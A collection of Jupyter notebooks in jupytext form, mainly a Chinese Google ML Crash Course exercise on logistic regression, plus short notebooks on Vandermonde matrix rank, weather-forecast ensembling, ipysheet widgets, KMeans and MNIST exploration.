# + colab={} colab_type="code" id="SE2-hq8PIYHz"
def train_linear_regressor_model(
learning_rate,
steps,
batch_size,
training_examples,
training_targets,
validation_examples,
validation_targets):
"""Trains a linear regression model.
In addition to training, this function also prints training progress information,
as well as a plot of the training and validation loss over time.
Args:
learning_rate: A `float`, the learning rate.
steps: A non-zero `int`, the total number of training steps. A training step
consists of a forward and backward pass using a single batch.
batch_size: A non-zero `int`, the batch size.
training_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for training.
training_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for training.
validation_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for validation.
validation_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for validation.
Returns:
A `LinearRegressor` object trained on the training data.
"""
periods = 10
steps_per_period = steps / periods
# Create a linear regressor object.
my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)
linear_regressor = tf.estimator.LinearRegressor(
feature_columns=construct_feature_columns(training_examples),
optimizer=my_optimizer
)
# Create input functions.
training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
batch_size=batch_size)
predict_training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
# Train the model, but do so inside a loop so that we can periodically assess
# loss metrics.
print("Training model...")
print("RMSE (on training data):")
training_rmse = []
validation_rmse = []
for period in range (0, periods):
# Train the model, starting from the prior state.
linear_regressor.train(
input_fn=training_input_fn,
steps=steps_per_period
)
# Take a break and compute predictions.
training_predictions = linear_regressor.predict(input_fn=predict_training_input_fn)
training_predictions = np.array([item['predictions'][0] for item in training_predictions])
validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)
validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])
# Compute training and validation loss.
training_root_mean_squared_error = math.sqrt(
metrics.mean_squared_error(training_predictions, training_targets))
validation_root_mean_squared_error = math.sqrt(
metrics.mean_squared_error(validation_predictions, validation_targets))
# Occasionally print the current loss.
print(" period %02d : %0.2f" % (period, training_root_mean_squared_error))
# Add the loss metrics from this period to our list.
training_rmse.append(training_root_mean_squared_error)
validation_rmse.append(validation_root_mean_squared_error)
print("Model training finished.")
# Output a graph of loss metrics over periods.
plt.ylabel("RMSE")
plt.xlabel("Periods")
plt.title("Root Mean Squared Error vs. Periods")
plt.tight_layout()
plt.plot(training_rmse, label="training")
plt.plot(validation_rmse, label="validation")
plt.legend()
return linear_regressor
# + colab={} colab_type="code" id="TDBD8xeeIYH2"
linear_regressor = train_linear_regressor_model(
learning_rate=0.000001,
steps=200,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
# + [markdown] colab_type="text" id="JjBZ_q7aD9gh"
# ## 任务 1:我们可以计算这些预测的对数损失函数吗?
#
# **检查预测,并确定是否可以使用它们来计算对数损失函数。**
#
# `LinearRegressor` 使用的是 L2 损失,在将输出解读为概率时,它并不能有效地惩罚误分类。例如,对于概率分别为 0.9 和 0.9999 的负分类样本是否被分类为正分类,二者之间的差异应该很大,但 L2 损失并不会明显区分这些情况。
#
# 相比之下,`LogLoss`(对数损失函数)对这些"置信错误"的惩罚力度更大。请注意,`LogLoss` 的定义如下:
#
# $$Log Loss = \sum_{(x,y)\in D} -y \cdot log(y_{pred}) - (1 - y) \cdot log(1 - y_{pred})$$
#
#
# 但我们首先需要获得预测值。我们可以使用 `LinearRegressor.predict` 获得预测值。
#
# 我们可以使用预测和相应目标计算 `LogLoss` 吗?
# + [markdown] colab_type="text" id="dPpJUV862FYI"
# ### 解决方案
#
# 点击下方即可查看解决方案。
# + colab={} colab_type="code" id="kXFQ5uig2RoP"
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)
validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])
_ = plt.hist(validation_predictions)
# + [markdown] colab_type="text" id="rYpy336F9wBg"
# ## 任务 2:训练逻辑回归模型并计算验证集的对数损失函数
#
# 要使用逻辑回归非常简单,用 [LinearClassifier](https://www.tensorflow.org/api_docs/python/tf/estimator/LinearClassifier) 替代 `LinearRegressor` 即可。完成以下代码。
#
# **注意**:在 `LinearClassifier` 模型上运行 `train()` 和 `predict()` 时,您可以通过返回的字典(例如 `predictions["probabilities"]`)中的 `"probabilities"` 键获取实值预测概率。Sklearn 的 [log_loss](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.log_loss.html) 函数可基于这些概率计算对数损失函数,非常方便。
#
# + colab={} colab_type="code" id="JElcb--E9wBm"
def train_linear_classifier_model(
learning_rate,
steps,
batch_size,
training_examples,
training_targets,
validation_examples,
validation_targets):
"""Trains a linear classification model.
In addition to training, this function also prints training progress information,
as well as a plot of the training and validation loss over time.
Args:
learning_rate: A `float`, the learning rate.
steps: A non-zero `int`, the total number of training steps. A training step
consists of a forward and backward pass using a single batch.
batch_size: A non-zero `int`, the batch size.
training_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for training.
training_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for training.
validation_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for validation.
validation_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for validation.
Returns:
A `LinearClassifier` object trained on the training data.
"""
periods = 10
steps_per_period = steps / periods
# Create a linear classifier object.
my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)
linear_classifier = # YOUR CODE HERE: Construct the linear classifier.
# Create input functions.
training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
batch_size=batch_size)
predict_training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
# Train the model, but do so inside a loop so that we can periodically assess
# loss metrics.
print("Training model...")
print("LogLoss (on training data):")
training_log_losses = []
validation_log_losses = []
for period in range (0, periods):
# Train the model, starting from the prior state.
linear_classifier.train(
input_fn=training_input_fn,
steps=steps_per_period
)
# Take a break and compute predictions.
training_probabilities = linear_classifier.predict(input_fn=predict_training_input_fn)
training_probabilities = np.array([item['probabilities'] for item in training_probabilities])
validation_probabilities = linear_classifier.predict(input_fn=predict_validation_input_fn)
validation_probabilities = np.array([item['probabilities'] for item in validation_probabilities])
training_log_loss = metrics.log_loss(training_targets, training_probabilities)
validation_log_loss = metrics.log_loss(validation_targets, validation_probabilities)
# Occasionally print the current loss.
print(" period %02d : %0.2f" % (period, training_log_loss))
# Add the loss metrics from this period to our list.
training_log_losses.append(training_log_loss)
validation_log_losses.append(validation_log_loss)
print("Model training finished.")
# Output a graph of loss metrics over periods.
plt.ylabel("LogLoss")
plt.xlabel("Periods")
plt.title("LogLoss vs. Periods")
plt.tight_layout()
plt.plot(training_log_losses, label="training")
plt.plot(validation_log_losses, label="validation")
plt.legend()
return linear_classifier
# + colab={} colab_type="code" id="VM0wmnFUIYH9"
linear_classifier = train_linear_classifier_model(
learning_rate=0.000005,
steps=500,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
# + [markdown] colab_type="text" id="i2e3TlyL57Qs"
# ### 解决方案
#
# 点击下方即可查看解决方案。
#
#
# + colab={} colab_type="code" id="5YxXd2hn6MuF"
def train_linear_classifier_model(
learning_rate,
steps,
batch_size,
training_examples,
training_targets,
validation_examples,
validation_targets):
"""Trains a linear classification model.
In addition to training, this function also prints training progress information,
as well as a plot of the training and validation loss over time.
Args:
learning_rate: A `float`, the learning rate.
steps: A non-zero `int`, the total number of training steps. A training step
consists of a forward and backward pass using a single batch.
batch_size: A non-zero `int`, the batch size.
training_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for training.
training_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for training.
validation_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for validation.
validation_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for validation.
Returns:
A `LinearClassifier` object trained on the training data.
"""
periods = 10
steps_per_period = steps / periods
# Create a linear classifier object.
my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)
linear_classifier = tf.estimator.LinearClassifier(
feature_columns=construct_feature_columns(training_examples),
optimizer=my_optimizer
)
# Create input functions.
training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
batch_size=batch_size)
predict_training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
# Train the model, but do so inside a loop so that we can periodically assess
# loss metrics.
print("Training model...")
print("LogLoss (on training data):")
training_log_losses = []
validation_log_losses = []
for period in range (0, periods):
# Train the model, starting from the prior state.
linear_classifier.train(
input_fn=training_input_fn,
steps=steps_per_period
)
# Take a break and compute predictions.
training_probabilities = linear_classifier.predict(input_fn=predict_training_input_fn)
training_probabilities = np.array([item['probabilities'] for item in training_probabilities])
validation_probabilities = linear_classifier.predict(input_fn=predict_validation_input_fn)
validation_probabilities = np.array([item['probabilities'] for item in validation_probabilities])
training_log_loss = metrics.log_loss(training_targets, training_probabilities)
validation_log_loss = metrics.log_loss(validation_targets, validation_probabilities)
# Occasionally print the current loss.
print(" period %02d : %0.2f" % (period, training_log_loss))
# Add the loss metrics from this period to our list.
training_log_losses.append(training_log_loss)
validation_log_losses.append(validation_log_loss)
print("Model training finished.")
# Output a graph of loss metrics over periods.
plt.ylabel("LogLoss")
plt.xlabel("Periods")
plt.title("LogLoss vs. Periods")
plt.tight_layout()
plt.plot(training_log_losses, label="training")
plt.plot(validation_log_losses, label="validation")
plt.legend()
return linear_classifier
# + colab={} colab_type="code" id="UPM_T1FXsTaL"
linear_classifier = train_linear_classifier_model(
learning_rate=0.000005,
steps=500,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
# + [markdown] colab_type="text" id="i-Xo83_aR6s_"
# ## 任务 3:计算准确率并为验证集绘制 ROC 曲线
#
# 分类时非常有用的一些指标包括:模型[准确率](https://en.wikipedia.org/wiki/Accuracy_and_precision#In_binary_classification)、[ROC 曲线](https://en.wikipedia.org/wiki/Receiver_operating_characteristic)和 ROC 曲线下面积 (AUC)。我们会检查这些指标。
#
# `LinearClassifier.evaluate` 可计算准确率和 AUC 等实用指标。
# + colab={} colab_type="code" id="DKSQ87VVIYIA"
evaluation_metrics = linear_classifier.evaluate(input_fn=predict_validation_input_fn)
print("AUC on the validation set: %0.2f" % evaluation_metrics['auc'])
print("Accuracy on the validation set: %0.2f" % evaluation_metrics['accuracy'])
# + [markdown] colab_type="text" id="47xGS2uNIYIE"
# 您可以使用类别概率(例如由 `LinearClassifier.predict`
# 和 Sklearn 的 [roc_curve](http://scikit-learn.org/stable/modules/model_evaluation.html#roc-metrics) 计算的概率)来获得绘制 ROC 曲线所需的真正例率和假正例率。
# + colab={} colab_type="code" id="xaU7ttj8IYIF"
validation_probabilities = linear_classifier.predict(input_fn=predict_validation_input_fn)
# Get just the probabilities for the positive class.
validation_probabilities = np.array([item['probabilities'][1] for item in validation_probabilities])
false_positive_rate, true_positive_rate, thresholds = metrics.roc_curve(
validation_targets, validation_probabilities)
plt.plot(false_positive_rate, true_positive_rate, label="our model")
plt.plot([0, 1], [0, 1], label="random classifier")
_ = plt.legend(loc=2)
# + [markdown] colab_type="text" id="PIdhwfgzIYII"
# **看看您是否可以调整任务 2 中训练的模型的学习设置,以改善 AUC。**
#
# 通常情况下,某些指标在提升的同时会损害其他指标,因此您需要找到可以实现理想折中情况的设置。
#
# **验证所有指标是否同时有所提升。**
# + colab={} colab_type="code" id="XKIqjsqcCaxO"
# TUNE THE SETTINGS BELOW TO IMPROVE AUC
linear_classifier = train_linear_classifier_model(
learning_rate=0.000005,
steps=500,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
evaluation_metrics = linear_classifier.evaluate(input_fn=predict_validation_input_fn)
print("AUC on the validation set: %0.2f" % evaluation_metrics['auc'])
print("Accuracy on the validation set: %0.2f" % evaluation_metrics['accuracy'])
# + [markdown] colab_type="text" id="wCugvl0JdWYL"
# ### 解决方案
#
# 点击下方即可查看可能的解决方案。
# + [markdown] colab_type="text" id="VHosS1g2aetf"
# 一个可能有用的解决方案是,只要不过拟合,就训练更长时间。
#
# 要做到这一点,我们可以增加步数和/或批量大小。
#
# 所有指标同时提升,这样,我们的损失指标就可以很好地代理 AUC 和准确率了。
#
# 注意它是如何进行很多很多次迭代,只是为了再尽量增加一点 AUC。这种情况很常见,但通常情况下,即使只有一点小小的收获,投入的成本也是值得的。
# + colab={} colab_type="code" id="dWgTEYMddaA-"
linear_classifier = train_linear_classifier_model(
learning_rate=0.000003,
steps=20000,
batch_size=500,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
evaluation_metrics = linear_classifier.evaluate(input_fn=predict_validation_input_fn)
print("AUC on the validation set: %0.2f" % evaluation_metrics['auc'])
print("Accuracy on the validation set: %0.2f" % evaluation_metrics['accuracy'])
| Google-MLCC-Exercises/mlcc-exercises-ipynb-files_cn/10_logistic_regression.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import matplotlib.pyplot as plt
np.set_printoptions(suppress=True)
x = np.linspace(1, 4,4)
print(x)
V = np.vander(x)
print(V)
# -
tol = None
r = []
max_size = 30
for i in range(max_size):
x = np.linspace(1,i+2,i+2)
V = np.vander(x)
r.append(np.linalg.matrix_rank(V, tol=tol))
u,s,vt = np.linalg.svd(V)
print(s)
plt.plot(np.linspace(0, len(s), len(s)), s)
#plt.hist(s, len(s))
plt.show()
plt.plot(np.linspace(1, max_size+1, max_size), r)
plt.xlabel('Tamanho da matriz')
plt.ylabel('Posto')
| src/notebooks/02/Valores singulares decrescente.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import glob
import pandas as pd
#获取指定目录下的所有图片
files = glob.glob('seq2seq*')
dfs=[]
for f in files:
print(f)
dfs.append(pd.read_csv(f))
df_ensemble = pd.DataFrame(columns=[dfs[0].columns])
df_ensemble.FORE_data = dfs[0].FORE_data
df_ensemble[[' t2m', ' rh2m', ' w10m']] = 0
df_ensemble = pd.DataFrame(columns=[dfs[0].columns])
df_ensemble.FORE_data = dfs[0].FORE_data
df_ensemble[[' t2m', ' rh2m', ' w10m']] = 0
for i in range(len(dfs)):
df_ensemble[[' t2m', ' rh2m', ' w10m']] += dfs[i][[' t2m', ' rh2m', ' w10m']].values
df_ensemble[[' t2m', ' rh2m', ' w10m']] = df_ensemble[[' t2m', ' rh2m', ' w10m']].values / len(dfs)
df_ensemble.to_csv('./ensemble_avg_2018101503.csv', index=False)
| src/weather_forecasting2018_eval/ensemble_2018101503/.ipynb_checkpoints/ensemble-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.7.4
# language: python
# name: python-374
# ---
# # `ipysheet`
#
# [ipysheet](https://github.com/QuantStack/ipysheet) connects ipywidgets with tabular data. It basically adds two widgets: a _Cell widget_ and a _Sheet widget_. There are also auxiliary functions for creating table rows and columns as well as for formatting and designing cells.
# ## Installation
#
# `ipysheet` can be easily installed with Pipenv:
#
# ```
# $ pipenv install ipysheet
# ```
# ## Import
import ipysheet
# ## Cell formatting
# +
sheet1 = ipysheet.sheet()
cell0 = ipysheet.cell(0, 0, 0, numeric_format='0.0', type='numeric')
cell1 = ipysheet.cell(1, 0, "Hello", type='text')
cell2 = ipysheet.cell(0, 1, 0.1, numeric_format='0.000', type='numeric')
cell3 = ipysheet.cell(1, 1, 15.9, numeric_format='0.00', type='numeric')
cell4 = ipysheet.cell(2, 2, "14-02-2019", date_format='DD-MM-YYYY', type='date')
sheet1
# -
# ## Examples
# ### Interactive table
# +
from ipywidgets import FloatSlider, IntSlider, Image
slider = FloatSlider()
sheet2 = ipysheet.sheet()
cell1 = ipysheet.cell(0, 0, slider, style={'min-width': '122px'})
cell3 = ipysheet.cell(1, 0, 42., numeric_format='0.00')
cell_sum = ipysheet.cell(2, 0, 42., numeric_format='0.00')
@ipysheet.calculation(inputs=[(cell1, 'value'), cell3], output=cell_sum)
def calculate(a, b):
return a + b
sheet2
# -
# ### Numpy
# +
import numpy as np
from ipysheet import from_array, to_array
arr = np.random.randn(6, 10)
sheet = from_array(arr)
sheet
# +
arr = np.array([True, False, True])
sheet = from_array(arr)
sheet
# -
to_array(sheet)
# ### Table search
# +
import numpy as np
import pandas as pd
from ipysheet import from_dataframe
from ipywidgets import Text, VBox, link
df = pd.DataFrame({'A': 1.,
'B': pd.Timestamp('20130102'),
'C': pd.Series(1, index=list(range(4)), dtype='float32'),
'D': np.array([False, True, False, False], dtype='bool'),
'E': pd.Categorical(["test", "train", "test", "train"]),
'F': 'foo'})
df.loc[[0, 2], ['B']] = np.nan
s = from_dataframe(df)
search_box = Text(description='Search:')
link((search_box, 'value'), (s, 'search_token'))
VBox((search_box, s))
# -
# ### Plot editable tables
# +
import numpy as np
from traitlets import link
from ipywidgets import HBox
import bqplot.pyplot as plt
from ipysheet import sheet, cell, column
size = 18
scale = 100.
np.random.seed(0)
x_data = np.arange(size)
y_data = np.cumsum(np.random.randn(size) * scale)
fig = plt.figure()
axes_options = {'x': {'label': 'Date', 'tick_format': '%m/%d'},
'y': {'label': 'Price', 'tick_format': '0.0f'}}
scatt = plt.scatter(x_data, y_data, colors=['red'], stroke='black')
fig.layout.width = '70%'
sheet1 = sheet(rows=size, columns=2)
x_column = column(0, x_data)
y_column = column(1, y_data)
link((scatt, 'x'), (x_column, 'value'))
link((scatt, 'y'), (y_column, 'value'))
HBox((sheet1, fig))
# -
# ## For further reading
#
# * [Interactive spreadsheets in Jupyter](https://towardsdatascience.com/interactive-spreadsheets-in-jupyter-32ab6ec0f4ff)
# * [GitHub](https://github.com/QuantStack/ipysheet)
# * [Docs](https://ipysheet.readthedocs.io/en/latest/)
#
| docs/workspace/jupyter/ipywidgets/libs/ipysheet.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
# +
trainingdata = np.random.rand(200,2)
X = np.array(trainingdata)
# -
kmeans = KMeans(n_clusters=8, random_state=0)
kmeans.fit(X)
print(kmeans.labels_)
print(kmeans.inertia_)
testdata = np.random.rand(20,2)
print(testdata)
kmeans.predict(np.array(testdata))
centers = kmeans.cluster_centers_
# +
plt.scatter(trainingdata[:,0],trainingdata[:,1] ,c ='g' , s = 8)
plt.scatter(testdata[:,0],testdata[:,1] ,c ='b' , s = 25)
for j in range(len(centers)):
plt.scatter(centers[j,0],centers[j,1] ,c ='r' , s = 100)
plt.show
# -
| Sklearn/KMeans/2.6.1.3 KMeans.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/vadManuel/Machine-Learning-UCF/blob/master/Homework/hw1/mvasquez_part3.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="rt44vyY1xW9b" colab_type="text"
# # MNIST digits data set
# + [markdown] id="l34GNy7tyNks" colab_type="text"
# ## Loading the MNIST digits data set
# + id="FSJyddqGexl5" colab_type="code" outputId="9398cffb-00f2-4155-9055-b2b3a16360c1" colab={"base_uri": "https://localhost:8080/", "height": 34}
from keras.datasets import mnist
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
# + [markdown] id="XuWVQX3CySIC" colab_type="text"
# ## Exploring the format of the MNIST digits data set
# + id="HKyztEf4fkBg" colab_type="code" outputId="2fa81e79-4d14-4f85-a81c-22d8d88a954b" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_images.shape
# + id="vA81OpzFyjyS" colab_type="code" outputId="b30d9102-3c10-4a38-c88f-c1db2cd1d57f" colab={"base_uri": "https://localhost:8080/", "height": 34}
len(train_images)
# + id="w85BC1AXxwds" colab_type="code" outputId="8a8e0a39-012f-41e2-feea-04cdee2c6a14" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_images.ndim
# + id="1sHFiZBFxnrB" colab_type="code" outputId="b8e515f8-9d9b-4a0a-cd93-290b4d975d64" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_images.dtype
# + id="euQWeEkpyCL5" colab_type="code" outputId="482b5f11-6bcc-47ea-e116-a72d26bfb7a6" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_labels
# + id="GfGCvZkGKYci" colab_type="code" outputId="825178b5-2345-45f5-db55-db2b24b51fb9" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_labels.shape
# + id="jqv0aUL-gGU_" colab_type="code" outputId="38d63c81-9dcc-4398-f3ce-b0e598a5b54f" colab={"base_uri": "https://localhost:8080/", "height": 34}
len(train_labels)
# + [markdown] id="dmQ2siA7ywPx" colab_type="text"
# ## Displaying MNIST digits
# + id="uSj4HIhWzBxl" colab_type="code" colab={}
import matplotlib.pyplot as plt
# %matplotlib inline
# + id="1Gdt3obzgQaY" colab_type="code" colab={}
digit_0 = train_images[0]
# + id="SQYWiIzigabf" colab_type="code" outputId="fc5618e3-8456-4de2-bc63-b00ed166265b" colab={"base_uri": "https://localhost:8080/", "height": 34}
digit_0.shape
# + id="02FA0zxcghOn" colab_type="code" outputId="410ebfd2-552f-4691-cd9d-d0e983bf62bc" colab={"base_uri": "https://localhost:8080/", "height": 269}
plt.figure(figsize=(4, 4))
plt.imshow(digit_0)
plt.show()
# + id="JuJltxVtgnq3" colab_type="code" outputId="8e5bbe9b-93fd-46e5-e560-43e2ce322f56" colab={"base_uri": "https://localhost:8080/", "height": 34}
label_0 = train_labels[0]
label_0
# + id="NpGZCtmMicTo" colab_type="code" outputId="5693bcd8-6931-4742-db54-d603539a1309" colab={"base_uri": "https://localhost:8080/", "height": 269}
plt.figure(figsize=(4, 4))
digit_1 = train_images[1]
plt.imshow(digit_1)
plt.show()
# + id="iYfl6wW9zltQ" colab_type="code" outputId="be7b4f10-60a4-4af3-9fe6-7172953c7612" colab={"base_uri": "https://localhost:8080/", "height": 34}
label_1 = train_labels[1]
label_1
# + id="yuNo1wPOkoqi" colab_type="code" colab={}
import numpy as np
# + id="UB7_xf0hzsPx" colab_type="code" colab={}
avg = [np.zeros((28,28)) for _ in range(10)]
count = np.zeros((10))
for i, label in enumerate(train_labels):
avg[label] += train_images[i]
count[label] += 1
for i in range(10):
avg[i] /= count[i]
# + id="pSKZk1NOksHa" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 302} outputId="4c8d7e98-3ee3-4c34-b248-0bbe471ae124"
plt.figure(figsize=(10,5))
plt.subplots_adjust(wspace=0.1)
for i in range(10):
plt.subplot(2,5,i+1)
plt.imshow(avg[i])
plt.axis('off')
plt.show()
# + id="CZFzbreXpAF4" colab_type="code" colab={}
| Homework/hw1/mvasquez_part3.ipynb |